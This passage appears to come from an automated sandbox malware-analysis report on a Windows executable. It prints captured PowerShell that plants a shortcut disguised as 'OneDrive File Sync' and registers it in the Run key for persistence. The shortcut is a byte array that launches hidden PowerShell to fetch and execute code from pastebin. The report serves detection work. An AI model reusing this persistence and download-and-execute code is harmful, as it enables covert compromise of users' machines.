(76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
